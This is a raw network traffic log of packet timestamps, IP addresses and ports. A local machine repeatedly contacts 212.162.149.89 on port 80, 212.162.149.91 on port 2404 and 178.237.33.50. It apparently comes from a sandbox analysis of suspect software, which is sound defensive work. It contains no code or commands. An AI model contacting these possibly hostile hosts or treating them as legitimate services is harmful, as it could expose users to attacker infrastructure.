                                                                          Dec 10, 2024 13:52:57.296009064 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.296081066 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.296117067 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.297605038 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.297646999 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.297677040 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.299200058 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.299237967 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.299309015 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.299346924 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.300860882 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.300900936 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.300968885 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.301002979 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.302412987 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.302583933 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.302623987 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.304033995 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.304071903 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.304111004 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.304146051 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.305917978 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.305982113 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.306021929 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.307293892 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.307334900 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.307403088 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.307436943 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.308756113 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.308794022 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.311841011 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.312031984 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.312068939 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.312604904 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.312644005 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.312689066 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.312724113 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.314263105 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.314389944 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.314426899 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.315957069 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.315995932 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.316020966 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.316056967 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.317488909 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.317524910 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.317585945 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.317627907 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.319569111 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.319755077 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.319792986 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.320875883 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.320914030 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.320934057 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.320970058 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.322303057 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.322454929 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.322494984 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.323874950 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.323913097 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.323975086 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.324011087 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.325335026 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.325371981 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.325442076 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.325478077 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.326687098 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.326787949 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.326827049 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.328017950 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.328056097 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.328083038 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.328119040 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.329391003 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.329428911 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.329482079 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.329515934 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.330833912 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.330867052 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.330877066 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.330905914 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.332168102 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.332207918 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.332278967 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.332324028 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.333575964 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.333620071 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.333662033 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.334985971 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.335024118 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.335035086 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.335067987 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.336394072 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.336431026 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.336530924 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.336565971 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.337822914 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.337888002 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.337924957 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.339133024 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.339171886 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.339215994 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.339247942 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.340553045 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.340591908 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.340616941 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.340651989 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.341979980 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.342097998 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.342139006 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.343390942 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.343460083 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.343482971 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.343519926 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.345089912 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.345132113 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.345160961 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.345204115 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.346124887 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.346263885 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.346298933 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.347659111 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.347697973 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.347724915 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.347754002 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.348967075 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.349003077 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.349054098 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.349087000 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.393769979 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.394213915 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.394444942 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.394735098 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.394897938 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.394983053 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.395023108 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.396106005 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.396119118 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.396147966 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.396178007 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.397198915 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.397676945 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.464396954 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.464461088 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.464538097 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.464852095 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.464895010 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.465120077 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.465161085 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.465243101 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.465282917 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.466326952 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.466531038 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.466568947 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.467478037 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.467520952 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.467586994 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.467631102 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.468631983 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.468676090 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.468751907 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.468792915 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.469878912 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.470170021 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.470211983 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.470905066 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.470944881 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.470966101 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.471007109 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.472074032 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.472142935 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.472165108 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.472204924 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.473153114 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.473309040 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.473356962 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.474329948 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.474473953 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.474519014 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.475447893 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.475492001 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.475574017 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.475615978 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.476564884 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.476660013 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.476703882 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.477674007 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.477720022 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.477741003 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.477782965 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.478830099 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.478899956 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.478965044 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.479005098 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.479945898 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.479988098 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.480035067 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.480073929 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.481055021 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.481185913 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.481230021 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.482187986 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.482230902 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.482295990 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.482337952 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.483372927 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.483414888 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.483475924 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.483520985 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.484426022 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.484554052 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.484599113 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.485570908 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.485625982 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.485691071 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.485744953 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.486720085 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.486766100 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.486820936 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.486860037 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.487773895 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.487819910 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:58.362973928 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:52:58.482460976 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:52:58.482662916 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:52:58.495419025 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:52:58.614876032 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:52:59.649044991 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:52:59.770776987 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:52:59.882679939 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:52:59.889051914 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.009241104 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.009295940 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.128856897 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.364224911 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.366046906 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.486140966 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.556202888 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.558361053 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.661454916 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.677889109 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.681770086 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.706701994 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.811196089 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:53:00.826112032 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.930660963 CET8049940178.237.33.50192.168.2.5
                                                                          Dec 10, 2024 13:53:00.930880070 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:53:00.931035995 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:53:01.050782919 CET8049940178.237.33.50192.168.2.5
                                                                          Dec 10, 2024 13:53:01.836289883 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:01.890404940 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.070458889 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.081154108 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.178631067 CET8049940178.237.33.50192.168.2.5
                                                                          Dec 10, 2024 13:53:02.178715944 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:53:02.193830967 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.200364113 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.200432062 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.313328981 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.319662094 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.562663078 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.564678907 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.564691067 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.564702988 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.564742088 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.564908981 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.681986094 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682003975 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682015896 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682028055 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682039976 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682075024 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682085991 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682097912 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.682204962 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.744784117 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.744824886 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.744996071 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.749021053 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.749124050 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.749331951 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.757767916 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.757848024 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.757914066 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.766302109 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.766485929 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.766545057 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.801556110 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.801668882 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.801853895 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.805923939 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.806057930 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.806174040 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.814626932 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.814734936 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.814790010 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.823272943 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.823359966 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.823414087 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.831840038 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.831938028 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.835171938 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.840539932 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.840682030 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.840732098 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.849108934 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.849225044 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.849294901 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.859683990 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.859836102 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.860219002 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.937267065 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.937442064 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.937505960 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.941554070 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.941735983 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.941786051 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.950057030 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.950158119 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.950227022 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.958652973 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.958832026 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.958970070 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.967271090 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.967408895 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.967456102 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.975938082 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.976069927 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.976120949 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.984561920 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.984618902 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.984668016 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.992980003 CET240449939212.162.149.91192.168.2.5
